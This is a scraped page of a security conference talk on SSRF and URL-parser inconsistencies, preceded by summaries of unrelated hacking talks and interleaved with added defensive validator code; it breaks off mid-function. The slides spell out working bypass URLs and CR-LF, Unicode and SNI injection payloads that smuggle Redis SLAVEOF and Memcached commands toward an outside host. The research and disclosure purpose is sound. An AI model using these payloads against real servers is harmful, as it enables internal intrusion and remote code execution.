The document discusses server-side request forgery (SSRF) vulnerabilities and techniques for exploiting and bypassing URL parsing issues to achieve protocol smuggling. It provides examples of exploiting URL parsers in various programming languages to conduct CR-LF injection and host/path injection. It also demonstrates abusing features of Glibc NSS and protocols like HTTPS to smuggle protocols over TLS SNI or bypass patches. The talk appears to be about advanced SSRF attacks and protocol smuggling techniques.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
Netcat (nc) is a networking utility that can be used to transfer files, run commands remotely, and scan ports on remote systems. It allows establishing TCP and UDP connections to ports on remote systems. The document provides examples of using nc to scan ports, transfer files between systems, set up reverse shells, and perform basic network tasks and administration. Google dorking techniques are also presented for searching websites and finding specific pages or files using keywords, titles, and URLs. The Whois tool is demonstrated to query registration records for domain names and obtain information like registrar, IP address, and name servers.
This document discusses network programming in Python using sockets. It explains that sockets allow communication across networks and the Python socket module provides an interface to work with sockets. It then describes how to create server and client sockets, including binding, listening, accepting connections, and sending/receiving data. It also covers different socket address families like AF_INET for IPv4 and provides code examples for a basic echo server and handling multiple clients using threads or processes.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
Site-to-site VPN between two ASAs over a real-world GPON FTTH link - laonap166
The document describes configuring a site-to-site VPN between two ASA firewalls located behind GPON routers in Ho Chi Minh City and Hanoi, Vietnam. Key steps include configuring interfaces and routing on the ASA in Hanoi, defining network objects, creating a crypto map to match traffic to the VPN, and establishing an IKEv1 and IPsec tunnel to the ASA in Ho Chi Minh City using pre-shared keys. Debug commands show the IKE negotiation and establishment of the VPN tunnel.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
This document provides information on configuring network settings on Linux Redhat systems. It discusses using ifconfig to configure interfaces, setting a default gateway and static routes. It also describes the network configuration files - /etc/hosts, /etc/resolv.conf, /etc/sysconfig/network, and /etc/sysconfig/network-scripts/ifcfg files. Specific parameters that can be configured in the ifcfg files are outlined. The document concludes with discussing using the Network Administration Tool and configuring DHCP.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar... - idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... - CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
This document describes a C program to implement a date-time server using TCP. The server program gets the system time, binds to a port, and sends the time string to any connected client. The client program connects to the server, receives the time string from the server, and prints it out. The programs successfully demonstrate a simple client-server model where the server provides the current date and time to multiple clients on request.
This document provides instructions for configuring a Frame Relay hub and spoke topology on several routers (R1, R3, R4, FR) and configuring OSPF routing.
The topology includes a Frame Relay switch router FR connecting to spokes R3 and R4 via DLCI 101 and 301 respectively. Hub R1 connects to FR via DLCI 102.
The tasks are to:
1) Configure Frame Relay on the routers to allow ping from R1 to R3 and R4 but not between R3 and R4.
2) Configure single-area OSPF routing on R1, R3, R4 to advertise all networks and allow full connectivity.
Let's dive under the hood of Java network applications. We plan to take a deep look at classic sockets and NIO with live coding examples. Then we discuss the performance problems of sockets and find out how NIO can help us handle 10000+ connections in a single thread. Finally, we learn how to build a high-load application server using Netty.
https://github.com/kslisenko/java-networking
This document discusses various issues in client/server programming and network server design. It covers topics like identifying servers, UDP and TCP client design, specifying local addresses, partial socket closes, concurrent vs iterative servers, and design alternatives like one process per client, preforked servers, and prethreaded servers. The best design depends on factors like expected client load, transaction sizes, and available system resources. Understanding these issues and testing alternatives is important for choosing an optimal server architecture.
Handy Networking Tools and How to Use Them - Sneha Inguva
Linux networking tools can be used to analyze network connectivity and performance. Tools like ifconfig show interface configurations, route displays routing tables, arp shows the ARP cache, dig/nslookup resolve DNS, and traceroute traces the network path. Nmap scans for open ports, ping checks latency, and tcpdump captures traffic. Iperf3 and wrk2 can load test throughput and capacity, while tcpreplay replays captured traffic. These CLI tools provide essential network information and testing capabilities from the command line.
This document provides an overview of routing protocols and network security concepts. It discusses distance vector protocols like RIP, path vector protocols like BGP, and link state protocols like OSPF. It covers routing attacks such as source routing, spoofing, and man-in-the-middle attacks. It also discusses secure routing requirements and authentication methods used in protocols.
True stories on the analysis of network activity using Python - delimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
The document provides an overview of network security topics including SIEM, logs, NetFlow, web logs, and compliance standards. It discusses how SIEM systems aggregate and correlate log/event data from multiple sources to provide security monitoring, incident response, forensic analysis and compliance reporting capabilities. Specific topics covered include syslog, NetFlow for network monitoring, and examples of web server logs and the types of data that can be extracted from logs for security purposes. Compliance standards like PCI-DSS and SOX are also mentioned in relation to why log collection and monitoring is important for audit requirements.
The document discusses network security and VPN tunnelling. It introduces VPN tunnelling as a way to secure communications over an unsecured network by encrypting the traffic. It describes how tunnelling works by encrypting the traffic and creating a secure tunnel for data transmission. It also discusses SSL/TLS and how it can be used to implement VPN tunnelling by encrypting the traffic and authenticating devices and packets.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
This document discusses the configuration of various server services, including:
- Setting up an Apache web server with SSL encryption and generating SSL certificates.
- Additional Apache configurations like virtual hosting, CGI scripts, and SELinux contexts.
- Basic SMTP configuration using Postfix and setting up an internal mail server.
- Configuring a caching-only DNS server using Named.
- Setting up NFS for file sharing between servers.
- Enabling file sharing with Windows clients using Samba (CIFS).
- Configuring an anonymous FTP server with vsftpd.
It provides instructions and examples for configuring each of these services on Linux servers.
The document discusses network layering models and TCP/IP fundamentals. It describes:
1. Networking problems are divided into layers for easier understanding and standardization, with the two main models being OSI and TCP/IP.
2. The TCP/IP model has four or five layers - process, host-to-host transport, internet, network access, and sometimes physical.
3. Packets are encapsulated as they leave a machine and decapsulated on the receiving host, with each layer adding headers.
The document discusses using Python for ethical hacking and penetration testing. It provides reasons for using Python such as its ease of use, readable syntax, rich libraries, and existing tools. It then covers various Python libraries and frameworks used for tasks like reconnaissance, scanning, exploitation, and packet manipulation. Specific topics covered include file I/O, requests, sockets, scapy, and more.
The document discusses security issues related to connected devices in homes and organizations. It provides results from scanning various devices on home and work networks, including details on open ports and services. It finds issues like outdated protocols, self-signed certificates, and lack of encryption on some devices. It notes that many administrators and users are unaware of vulnerabilities in connected devices. It recommends steps administrators and developers can take to improve device security, such as applying patches, network segmentation, monitoring traffic, using encryption, and penetration testing.
Upon reading the document, the key steps in a router's start-up process can be summarized as follows:
1. When power is applied, the router performs a power-on self-test and loads the bootstrap code from ROM to initialize hardware and find the IOS image.
2. The IOS image is then loaded from flash memory or another source such as TFTP into RAM where it is decompressed and executed.
3. The startup configuration is loaded, typically from NVRAM. If no configuration is present, the router enters setup mode to configure initial settings.
Office Comunnications Server 2007 R2 PosterPaulo Freitas
This document provides an overview of the workload architecture for a unified communications solution. It includes a legend defining the various hardware components, diagrams showing traffic flows between internal and external systems, and details on DNS records, certificates, and firewall configurations required. The solution comprises multiple workloads including IM and presence, audio/video conferencing, enterprise voice, and application sharing, with load balanced front end servers and edge servers directing traffic between internal and external networks.
This document provides information on various debugging and profiling tools that can be used for Ruby including:
- lsof to list open files for a process
- strace to trace system calls and signals
- tcpdump to dump network traffic
- google perftools profiler for CPU profiling
- pprof to analyze profiling data
It also discusses how some of these tools have helped identify specific performance issues with Ruby like excessive calls to sigprocmask and memcpy calls slowing down EventMachine with threads.
The document discusses various security risks and mitigation strategies at different levels of a software stack, including vulnerabilities that can exist in servers, networks, and applications like Drupal. It provides an overview of the OWASP Top 10 security risks and recommends defensive strategies like secure coding practices and input validation. Specific mitigations are proposed for threats like SQL injection, cross-site scripting, file uploads, and DDoS attacks.
This document provides an overview of common Linux networking commands such as ifconfig, route, traceroute, nslookup, arp, dig, and netstat that are used to configure network interfaces, display routing tables, trace network routes, lookup domain names, manage address resolution, query DNS servers, and view network statistics. It also discusses how to use ifconfig to assign IP addresses to interfaces, route to view routing tables, arp to manage the address resolution cache, and dig for more powerful DNS lookups than nslookup.
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?Julien Vermillard
M2M/IoT is rapidly growing and since its early days different “standard” protocols have emerged (e.g. OMA-DM, TR-069, MQTT, …) or are emerging (e.g. CoAP or Lightweight M2M). Understanding which protocol to use for which application can be intimidating, therefore we propose to give an overview of these protocols to help you understand their goals and characteristics. We’ll present common M2M use cases and why they usually require more than just one protocol ; we will also see whether CoAP associated with Lightweight M2M allows to forge “one protocol to rule them all”.
Presentation of a few mechanisms that can help to automate the bootstrap process in IoT environment.
This is the summary of my work done during an 8 weeks internship at red hat
This document outlines a presentation on how a hacker views a website. It includes sections on introduction, demonstration, tools, CERT-FR, and questions. Tools mentioned include nmap, netdiscover, Wpscan, nessus, nikto, John, Burp, metasploit, sqlmap, and Github for information gathering, vulnerability assessment, and exploitation. It recommends checking the CERT-FR website and following their Twitter account for security advisories.
The document describes steps to configure a network including: designing an IP addressing scheme; configuring DHCP, WAN technologies, EIGRP routing, and NAT; and implementing ACLs for security. Key steps include subnetting the 172.16.1.128/25 network and assigning addresses, configuring R3 as a DHCP server, enabling routing with EIGRP, using NAT on R2 for Internet access, and applying ACLs to restrict access between networks.
Une plongée dans le monde merveilleux des certificats et des autorités de certification. Comment fonctionne une autorité de certification ? Puis-je avoir confiance et pourquoi ? Comment créer la mienne ?
This document provides an overview of the basic function call flow for OpenSSL to establish a secure TCP connection. It discusses initializing the OpenSSL library, creating an SSL_CTX object, generating randomness, creating an SSL object for a connection, performing the TLS/SSL handshake, and reading and writing data over the encrypted connection. It also provides examples of OpenSSL code for a client application.
SIP is a protocol for establishing multimedia sessions over IP networks. It originated from work in the 1990s on protocols like SCIP and SIP drafts. SIP eventually became standardized as RFC 3261 and is now widely used for voice and video calling. Cisco supports SIP in products like Cisco Unified Communications Manager, Cisco Unified Border Element, and Cisco Unified Presence to enable VoIP calling and integration between SIP and other protocols. The future of SIP includes more peer-to-peer implementations and using presence as a foundation for new services.
The document discusses Linux networking commands and tools. It provides examples of using ip commands to view and configure network interfaces, routes, neighbors, and rules. It also shows tcpdump for packet capture and nmap for port scanning. Firewalls are configured using iptables to allow traffic from a specific source to a web server port.
Build reliable, traceable, distributed systems with ZeroMQRobin Xiao
ZeroMQ is used to build a distributed system with reliable and traceable communication. It allows exposing code over RPC with minimal modification. Exceptions are properly propagated across services. The system is language agnostic and brokerless. Introspection allows viewing methods and signatures without opening code. Streaming APIs allow continuous updates without timeouts. Tracing helps profile nested calls and identify performance bottlenecks. Security is not implemented but could use SSL or authentication layers.
The document describes a Secure Active Switch (SAS) system that implements modifications to the Linux kernel bridge to prevent ARP poisoning attacks on a local network. The SAS runs on an embedded system using a ColdFire Motorola processor. It functions as an active network switch that can detect and block ARP attacks by monitoring packets and learning the MAC-IP bindings. Testing showed the SAS successfully blocked ARP poisoning attempts while only adding around 1% more latency to regular network traffic.
The document provides 8 steps to secure a Cisco router by restricting access, disabling unused services, encrypting passwords, and logging activities. These simple steps include controlling access to ports, restricting telnet access, blocking spoof packets, restricting SNMP, encrypting passwords, disabling services like HTTP, adding security options, and configuring logging to a remote server. Proper configuration following these steps can significantly increase router security based on nmap scans showing all ports filtered after securing the device.
4. The largest hacker conference in Taiwan
founded by chrO.ot
About Orange Tsai
5. Speaker - Speaker at several security conferences
HITCON, WooYun, AVTokyo
CTFer - CTFs we won champions / in finalists (as team HITCON)
DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF
Bounty Hunter - Vendors in which I have found Remote Code Execution
Facebook, GitHub, Uber, Apple, Yahoo, Imgur
About Orange Tsai
6. Agenda
Introduction
Make SSRF great again
Issues that lead to SSRF-Bypass
Issues that lead to protocol smuggling
Case studies and Demos
Mitigations
7. What is SSRF?
Server Side Request Forgery
Bypass Firewall, Touch Intranet
Compromise Internal services
Struts2
Redis
Elastic
8. Protocol Smuggling in SSRF
Make SSRF more powerful
Protocols that are suitable to smuggle
HTTP based protocol
Elastic, CouchDB, Mongodb, Docker
Text-based protocol
FTP, SMTP, Redis, Memcached
21. URL Parsing Issues
It's all about the inconsistency between URL parser and requester
Why is validating a URL hard?
1. The specification lives in RFC 2396 and RFC 3986, but a spec is just a spec
2. WHATWG defined a contemporary URL standard based on the RFCs, but
different languages still have their own implementations
31. Several programming languages suffered from this issue
cURL, PHP, Python
RFC 3986 section 3.2
The authority component is preceded by a double slash ("//") and is
terminated by the next slash ("/"), question mark ("?"), or number sign
("#") character, or by the end of the URI
Abusing URL Parsers
35. Abusing URL Parsers
cURL / libcurl
PHP parse_url 💀
Perl URI 💀
Ruby uri
Ruby addressable 💀
NodeJS url 💀
Java net.URL
Python urlparse
Go net/url 💀
36. Reported the bug to the cURL team and got a patch quickly
Bypassed the patch with a space
Abusing URL Parsers
http://foo@127.0.0.1 @google.com/
37. Report Again But…
"curl doesn't verify that the URL is 100% syntactically correct. It is
instead documented to work with URLs and sort of assumes that
you pass it correct input"
39. Consider the following NodeJS code
NodeJS Unicode Failure
var base = "http://orange.tw/sandbox/";
var path = req.query.path;
if (path.indexOf("..") == -1) {
http.get(base + path, callback);
}
46. NodeJS Unicode Failure
The HTTP module prevents CR-LF injection in requests:
it URL-encodes the new-lines before sending the path
http://127.0.0.1:6379/\r\nSLAVEOF orange.tw 6379\r\n
$ nc -vvlp 6379
>> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1
>> Host: 127.0.0.1:6379
>> Connection: close
47. NodeJS Unicode Failure
The HTTP module prevents CR-LF injection in requests
Break the protection with Unicode U+FF0D ("－") and U+FF0A ("＊"), plus U+FF20 ("＠") for the space:
the module keeps only the low byte of each code point, so they become 0x0D, 0x0A and 0x20
http://127.0.0.1:6379/－＊SLAVEOF＠orange.tw＠6379－＊
$ nc -vvlp 6379
>> GET /
>> SLAVEOF orange.tw 6379
>> HTTP/1.1
>> Host: 127.0.0.1:6379
>> Connection: close
48. GLibc NSS Features
In Glibc source code file resolv/ns_name.c#ns_name_pton()
/*%
* Convert an ascii string into an encoded domain name
as per RFC1035.
*/
int
ns_name_pton(const char *src, u_char *dst, size_t dstsiz)
49. GLibc NSS Features
RFC1035 - Decimal support in gethostbyname()
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
int main(int argc, char **argv) {
    char *host = "or\\097nge.tw"; /* "\097" is the RFC 1035 decimal escape for 'a' */
    struct in_addr *addr = (struct in_addr *)gethostbyname(host)->h_addr;
    printf("%s\n", inet_ntoa(*addr));
    return 0;
}
…50.116.8.239
50. GLibc NSS Features
RFC1035 - Decimal support in gethostbyname()
>>> import socket
>>> host = 'or\\097nge.tw'
>>> print host
or\097nge.tw
>>> socket.gethostbyname(host)
'50.116.8.239'
51. GLibc NSS Features
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
int main(int argc, char **argv) {
    struct addrinfo *res;
    getaddrinfo("127.0.0.1 foo", NULL, NULL, &res); /* trailing " foo" is ignored */
    struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr;
    printf("%s\n", inet_ntoa(ipv4->sin_addr));
    return 0;
}
…127.0.0.1
Linux getaddrinfo() strips the trailing rubbish that follows whitespace
52. GLibc NSS Features
Linux getaddrinfo() strips the trailing rubbish that follows whitespace
Lots of implementations rely on getaddrinfo()
>>> import socket
>>> socket.gethostbyname("127.0.0.1\r\nfoo")
'127.0.0.1'
53. GLibc NSS Features
Exploit Glibc NSS features on URL Parsing
http://127.0.0.1\tfoo.google.com
http://127.0.0.1%09foo.google.com
http://127.0.0.1%2509foo.google.com
54. GLibc NSS Features
Exploit Glibc NSS features on URL Parsing
Why does this work?
Some library implementations decode the URL TWICE, so %2509 becomes %09 and then a tab,
and getaddrinfo() drops everything after it…
http://127.0.0.1%2509foo.google.com
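The validator below is an added example (not code from the slides or from any of the libraries the talk fuzzed). It applies the RFC 3986 rule quoted above, that the authority ends at the first "/", "?" or "#", but refuses every authority a requester might read differently: userinfo ("@"), whitespace and control characters, percent-encoding, non-ASCII, a second ":" and numeric hosts that are not a plain dotted quad (so "0", "0x7f.1" and "2130706433", which glibc's inet_aton accepts, are refused; the last two forms are my generalisation of the http://0/ case). Nothing is decoded: the host it returns is the exact string that must be handed to the requester. The URL list and helper names are this example's own.

```python
"""Strict URL splitting that refuses every ambiguous authority in the talk."""
import ipaddress
import re
from urllib.parse import unquote

# RFC 1123 hostname label: letters, digits, hyphen; no leading/trailing hyphen.
_LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")
# The only characters allowed in the authority: no "@", no "%", no spaces.
_AUTHORITY_RE = re.compile(r"^[A-Za-z0-9.\-:]+$")
_DEFAULT_PORT = {"http": 80, "https": 443}


def strict_split(url):
    """Return (scheme, host, port, path_and_query) or raise ValueError."""
    m = re.match(r"(https?)://", url, re.I)
    if not m:
        raise ValueError("scheme must be http or https")
    scheme = m.group(1).lower()
    rest = url[m.end():]
    # RFC 3986 3.2: the authority ends at the first "/", "?" or "#".
    cut = min([rest.find(c) for c in "/?#" if c in rest] + [len(rest)])
    authority, tail = rest[:cut], rest[cut:]
    path = tail.split("#", 1)[0]          # the fragment is never sent
    if not path.startswith("/"):
        path = "/" + path
    if not _AUTHORITY_RE.match(authority):
        raise ValueError("authority %r contains a character a requester may "
                         "read differently" % authority)
    host, sep, port_str = authority.partition(":")
    port = _DEFAULT_PORT[scheme]
    if sep:
        if not port_str.isdigit() or not 1 <= int(port_str) <= 65535:
            raise ValueError("bad port %r" % port_str)
        port = int(port_str)
    host = host.lower().rstrip(".")
    labels = host.split(".")
    if not host or len(host) > 253 or not all(_LABEL_RE.match(lab) for lab in labels):
        raise ValueError("bad host %r" % host)
    if labels[-1].isdigit():
        # Looks like an IP literal: accept only a canonical dotted quad,
        # never the shorthand forms inet_aton() understands.
        try:
            ipaddress.IPv4Address(host)
        except ValueError:
            raise ValueError("non-canonical IPv4 literal %r" % host)
    return scheme, host, port, path


def decode_twice(s):
    """What a library that URL-decodes twice ends up resolving."""
    return unquote(unquote(s))


def rejected(url):
    """True when strict_split refuses the URL."""
    try:
        strict_split(url)
    except ValueError:
        return True
    return False


# Constructed list: the bypass URLs from the talk plus three inet_aton shorthands.
AMBIGUOUS_URLS = [
    "http://foo@127.0.0.1 @google.com/",
    "http://foo@127.0.0.1:11211@google.com:80/",
    "http://127.0.0.1\tfoo.google.com",
    "http://127.0.0.1%09foo.google.com",
    "http://127.0.0.1%2509foo.google.com",
    "http://0\r\n SLAVEOF orange.tw 6379\r\n :80",
    "http://0/",
    "http://0x7f.1/",
    "http://2130706433/",
]

if __name__ == "__main__":
    for u in AMBIGUOUS_URLS:
        print("%-48r rejected=%s" % (u, rejected(u)))
    # The "#" case parses unambiguously once the RFC rule is applied.
    print(strict_split("http://127.0.0.1:11211#@google.com:80/"))
    print(repr(decode_twice("127.0.0.1%2509foo.google.com")))
```

The "#" URL from the PHP case is not rejected: applying the RFC rule gives host 127.0.0.1 and port 11211, which is what cURL fetches, so a blocklist applied to strict_split's host catches it. Whether 127.0.0.1 itself is allowed is a separate policy decision on the resolved address.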
55. Exploit Glibc NSS features on Protocol Smuggling
HTTP/1.1 requires a Host header
$ curl -vvv http://I-am-a-very-very-weird-domain.com
>> GET / HTTP/1.1
>> Host: I-am-a-very-very-weird-domain.com
>> User-Agent: curl/7.53.1
>> Accept: */*
GLibc NSS Features
56. GLibc NSS Features
Exploit Glibc NSS features on Protocol Smuggling
HTTP/1.1 requires a Host header
http://127.0.0.1\r\nSLAVEOF orange.tw 6379\r\n:6379/
$ nc -vvlp 6379
>> GET / HTTP/1.1
>> Host: 127.0.0.1
>> SLAVEOF orange.tw 6379
>> :6379
>> Connection: close
57. GLibc NSS Features
https://127.0.0.1\r\nSET foo 0 60 5\r\n:443/
$ nc -vvlp 443
>> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB..
>> .....5'%"127.0.0.1
>> SET foo 0 60 5
Exploit Glibc NSS features on Protocol Smuggling
SNI Injection - Embed hostname in SSL Client Hello
Simply replace HTTP with HTTPS
58. GLibc NSS Features
Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
The patch rejects a bare CR or LF, but what about a CR-LF followed by a space?
_is_illegal_header_value = \
    re.compile(rb'\n(?![ \t])|\r(?![ \t\n])').search
…
if _is_illegal_header_value(values[i]):
    raise ValueError('Invalid header value %r' % (values[i],))
59. Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
A CR-LF followed by a space or tab is header folding, which the regex still allows
Bypass with a leading space
>>> import urllib
>>> url = 'http://0\r\n SLAVEOF orange.tw 6379\r\n :80'
>>> urllib.urlopen(url)
GLibc NSS Features
60. Break the Patch of Python CVE-2016-5699
Exploit with a leading space
Thanks to Redis and Memcached, which ignore leading whitespace on an inline command
GLibc NSS Features
http://0\r\n SLAVEOF orange.tw 6379\r\n :6379/
>> GET / HTTP/1.0
<< -ERR wrong number of arguments for 'get' command
>> Host: 0
<< -ERR unknown command 'Host:'
>>  SLAVEOF orange.tw 6379
<< +OK Already connected to specified master
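The following is an added example (not code from the slides, CPython or Node.js) covering both CR-LF tricks above: the leading-space bypass of the CVE-2016-5699 regex on slides 58-60 and the fullwidth-character bypass of the Node.js HTTP module on slides 46-47. It reproduces the header-value regex quoted on slide 58, a strict replacement, an 8-bit truncation modelled on the Node failure (assumption: the module kept only the low byte of each code point, which is what turns U+FF0D into 0x0D), and a simplified view of how a Redis server splits the resulting bytes into inline commands. The Redis splitter is an illustration only; the real server uses sdssplitargs, which also handles quoting.

```python
"""Request-smuggling checks for the talk's two CR-LF bypasses."""
import re

# Regex quoted on slide 58: a CR or LF is only illegal when NOT followed by
# a space or tab, so "\r\n " (obsolete header folding) passes.
_OLD_ILLEGAL = re.compile(rb"\n(?![ \t])|\r(?![ \t\n])").search

# Strict replacement: any CR, LF or NUL in a header value is rejected.
_STRICT_ILLEGAL = re.compile(rb"[\r\n\x00]").search


def passes_old_check(value):
    """True if the patched putheader() would have accepted this value."""
    return _OLD_ILLEGAL(value) is None


def passes_strict_check(value):
    """True only if the value contains no CR, LF or NUL at all."""
    return _STRICT_ILLEGAL(value) is None


def low_byte_encode(text):
    """Keep only the low 8 bits of every code point (assumed model of the
    vulnerable string-to-buffer conversion): U+FF0D -> 0x0D, U+FF0A -> 0x0A,
    U+FF20 -> 0x20, ASCII unchanged."""
    return bytes(ord(ch) & 0xFF for ch in text)


def redis_inline_commands(raw):
    """Split raw bytes the way a Redis server reads inline commands
    (simplified): one command per line, whitespace-separated arguments,
    leading whitespace and empty lines ignored."""
    commands = []
    for line in raw.split(b"\n"):
        parts = line.rstrip(b"\r").split()
        if parts:
            commands.append(parts)
    return commands


# Constructed samples built from the two bypass URLs on the slides.
LEADING_SPACE_HOST = b"0\r\n SLAVEOF orange.tw 6379\r\n :80"
FULLWIDTH_PATH = "/\uff0d\uff0aSLAVEOF\uff20orange.tw\uff206379\uff0d\uff0a"


def smuggled_by_python(host=LEADING_SPACE_HOST):
    """Commands Redis sees when the host above is sent as the Host header."""
    request = b"GET / HTTP/1.0\r\nHost: " + host + b"\r\n\r\n"
    return redis_inline_commands(request)


def smuggled_by_node(path=FULLWIDTH_PATH):
    """Commands Redis sees after the fullwidth path is truncated to bytes."""
    request = (b"GET " + low_byte_encode(path)
               + b" HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\n")
    return redis_inline_commands(request)


if __name__ == "__main__":
    print("old regex accepts leading-space CRLF:", passes_old_check(LEADING_SPACE_HOST))
    print("strict check accepts it:", passes_strict_check(LEADING_SPACE_HOST))
    print(low_byte_encode(FULLWIDTH_PATH))
    for cmd in smuggled_by_python() + smuggled_by_node():
        print(b" ".join(cmd))
```

The lesson the two functions share: a check that allows any form of line break, even the "legal" folded kind, is a check the target protocol may not share, so header values and request paths should be rejected outright on CR, LF or NUL before any encoding step.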
61. Abusing IDNA Standard
The problem arises when the URL parser and the URL requester use
different IDNA standards
Input               IDNA2003      UTS46         IDNA2008
ⓖⓞⓞⓖⓛⓔ.com          google.com    google.com    Invalid
g\u200Doogle.com    google.com    google.com    xn--google-pf0c.com
baß.de              bass.de       bass.de       xn--ba-hia.de
62. Abusing IDNA Standard
>> "ß".toLowerCase()
"ß"
>> "ß".toUpperCase()
"SS"
>> ["ss", "SS"].indexOf("ß")
-1
>> location.href = "http://wordpreß.com"
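As an added example (not code from the slides): Python's built-in "idna" codec implements IDNA2003 (nameprep plus punycode), the same column of the table above, so it shows offline which ASCII name a requester of that generation resolves. Circled letters, the zero-width joiner and the sharp s are folded away before the lookup, which is why a blocklist that compares the raw Unicode host never matches. The checks and the blocklist below are this example's own; "bücher.de" is included as a legitimate IDN for contrast.

```python
"""IDNA canonicalisation before any host comparison."""


def to_alabel(host):
    """ASCII form an IDNA2003 requester resolves (Python's idna codec)."""
    return host.encode("idna").decode("ascii")


def is_blocked_naive(host, blocklist):
    """The check the talk bypasses: compares the raw user-supplied string."""
    return host.lower() in blocklist


def is_blocked_canonical(host, blocklist):
    """Convert to the A-label first, then compare."""
    return to_alabel(host) in blocklist


def folds_to_plain_ascii(host):
    """True when a non-ASCII host is mapped by IDNA2003 onto an ordinary
    ASCII name with no xn-- label. A genuine IDN always produces xn--;
    the talk's three examples do not, so this is the spoof signature."""
    if host.isascii():
        return False
    return not any(label.startswith("xn--") for label in to_alabel(host).split("."))


def canonical_host(host):
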